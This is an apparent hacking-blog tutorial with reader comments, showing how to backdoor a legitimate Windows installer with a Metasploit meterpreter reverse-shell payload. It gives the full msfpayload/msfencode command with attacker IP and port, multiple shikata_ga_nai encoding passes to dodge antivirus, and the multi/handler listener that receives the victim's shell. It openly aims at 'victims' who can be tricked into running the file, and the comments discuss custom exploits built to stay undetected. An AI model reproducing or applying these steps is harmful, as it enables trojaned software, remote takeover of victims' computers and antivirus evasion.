Добродошли!
How was the weekend?? All good and hung over? Good! For today a tutorial on how to backdoor any .EXE file with msfpayload. About a decade ago when i first discovered RAT (Remote Administration Tool) programs, i had to go through various binders, cryptors and icon changers to try and successfully bind an .EXE with an exploit or malware. Finding an undetectable RAT was an even bigger problem. Of course back then my programming skills were beyond shit for me to whip up a stable undetectable RAT, so plan B was to whip up a shitty winsock program in Visual Basic. It was a horrible, unstable program but it was undetectable and i could bind it with the .EXE without any worry of AV detection. It did enough to get me access into the victims computer long enough so i could modify the AV files and upload a working stable detectable RAT. Oh fun times!!
But how time flies!. Thanks to the beauty that is Metasploit, we can now backdoor any .EXE file!
NOTE:This tutorial will only demonstrate how to bind an .exe with a metasploit payload. I will not be explaining the ways to get your victims to execute it. Your creativity is your duty. You may download the PDF version of this tutorial here.
Lets Begin :
1) Locate your .exe and place it in your Home directory as shown below.
2) To list the available payloads, type : msfpayload -l.
3) As shown below, we will be using windows/meterpreter/bind_tcp.
4) Syntax to bind file : msfpayload <payload> <LHOST=>< LPORT= >R | msfencode -e x86/shikata_ga_nai -c 6 -t exe -x <.exe location> -o <output file name>.
5) So in my case i would type : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=666 R | msfencode -e x86/shikata_ga_nai -c 6 -t exe -x/root/devcpp-setup.exe -o /root/dedcpp-modified.exe.
6) I have instructed msfpayload to bind my .exe with a meterpreter/reverse_tcp payload and to encode it 6 times with x86/shikata_ga_nai. It is also set to establish a connection to my port 666.
5) Our newly modified file can be located in our Home directory.
6) Now that we have our modified executable ready, we will need to set up a handler to manage incoming connections from our victims. Lets proceed to open a fresh tab and type : msconsole.
7) To set exploit option, type : use exploit/multi/handler.
8) Set the same payload type, IP address and port number that you declared when creating your modified .EXE (refer to point 6) for LHOST and LPORT.
9) Finally to start your handler, type : exploit.
10) Now when you run the .exe on a victim computer or find a way to get them to execute it. Your handler terminal will be prompted with a meterpreter shell from your targets computer and access will be granted!
11) For the fun of it, i decided to scan the modified .EXE with virus total. 7/41 detections, which i think is pretty decent for a standard set up. We used x86/shikata_ga_nai to encode our file 6 times, do try and encode it with different encoding options to see various results.
12) You can retrieve the various encoding options by typing show encoders in your msfconsole terminal.
Authors Note :
1) This just demonstrates how to backdoor an exe for a local area network attack. You can easily make this an over the internet attack by a few tweak to your settings. (eg: port-forwarding, modifying payload option) I will get to that in the upcoming lessons. You may download the PDF version of this tutorial here.
2)This is for educational purposes only.
3)Do NOT harm the innocent.
“Reality is just a crutch for people who can’t handle drugs.” ― Robin P. Williams
Contributed By
James
<– Metasploit : Create, upload & exploit with java payload (.jsp)
Hey James. Loving your blog man! Keep’em coming!
Any chance you would post an tutorial on creating your own custom exploit? I have read that with creating your own exploits you can sometimes be undetectable from AV’s.
Hey Chris, Glad you are enjoying it!
I will be getting to that soon. Just got a few more tutorials to upload and tick off the list. And yes anything that is home made (custom) will beat the AV 99.9% of the time as it wont be in the AV .dat files for it to detect.
Usually when an exploit or virus gets too well known and notorious, their signatures get listed into the AV database, which then sends it to us users as updates. So as long one uses the exploit/backdoor for themselves, it can stay undetectable. But some programming knowledge is necessary.
Hope all is well! And thanks again Chris!
Thanks James for explaining that! Are most exploits written in python?
No worries Chris,
Exploits are a piece of data or software or a sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended etc etc. – wiki
So that means exploits can be programmed in nearly all langues as long as you are creative enough.
For example if there is a server running on an UNIX system, then i would use a C, Python or Ruby exploit against it because Unix understands the these languages. But if i was doing a browser or web hack then i would better learn java programming, php, jsp and all those web related programming stuff. The exploit language has to relate to the target language.
So basically if you want to hack servers (which run on unix most of the time), then you have to pick all 3 of them up. Or master in one and have an idea of the other two.
You need to figure out what kind of exploits suit your need and from there you will know which category of programming languages you will need to mainly master. I am biased towards C cause i think its the languages of superior aliens.
[...] Metasploit : Backdoor any .EXE file with msfpayload [...]
Oh wow. Okay I didn’t realize that. Thanks again James. Much appreciated!
Edited the last reply! Much more clearer